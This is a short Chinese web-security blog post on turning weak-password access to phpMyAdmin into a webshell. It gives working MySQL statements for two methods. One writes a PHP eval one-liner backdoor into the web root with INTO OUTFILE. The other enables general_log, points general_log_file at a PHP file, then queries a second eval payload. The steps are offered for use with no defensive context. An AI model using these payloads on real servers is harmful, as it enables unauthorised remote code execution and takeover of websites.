【Web安全】拿到phpMyAdmin如何获取权限

文章目录

通过弱口令拿到进到phpMyAdmin页面如何才能获取权限

1、outfile写一句话

尝试执行outfile语句写入一句话木马

mysql 复制代码
select "<?php @eval($_REQUEST[6868])?>"  into outfile "C:\\phpStudy\\WWW\\phpadmin.php";

如果执行失败show variables like "%secure%"; 查看配置

2、general_log_file写一句话

查看general_log是否开启

通过show global variables like "%genera%";查看

执行set global general_log="on";打开

通过generali_log_file写入一句话木马

set global general_log_file="网站绝对路径/文件名";
mysql 复制代码
SELECT "<?php @eval($_POST[1])?>"

general_log_file会记录所有的查询语句,以原始的状态来显示,如果将general_log开关打开,general_log_file设置为一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,通过访问general_log_file指定的文件来获取webshell。

相关推荐
Suckerbin44 分钟前
Hms?: 1渗透测试
学习·安全·网络安全
无极程序员1 小时前
PHP常量
android·ide·android studio
Diamond技术流1 小时前
从0开始学习Linux——网络配置
linux·运维·网络·学习·安全·centos
Spring_java_gg1 小时前
如何抵御 Linux 服务器黑客威胁和攻击
linux·服务器·网络·安全·web安全
独行soc2 小时前
#渗透测试#SRC漏洞挖掘#深入挖掘XSS漏洞02之测试流程
web安全·面试·渗透测试·xss·漏洞挖掘·1024程序员节
萌面小侠Plus2 小时前
Android笔记(三十三):封装设备性能级别判断工具——低端机还是高端机
android·性能优化·kotlin·工具类·低端机
慢慢成长的码农2 小时前
Android Profiler 内存分析
android
大风起兮云飞扬丶2 小时前
Android——多线程、线程通信、handler机制
android
L72562 小时前
Android的Handler
android
清风徐来辽2 小时前
Android HandlerThread 基础
android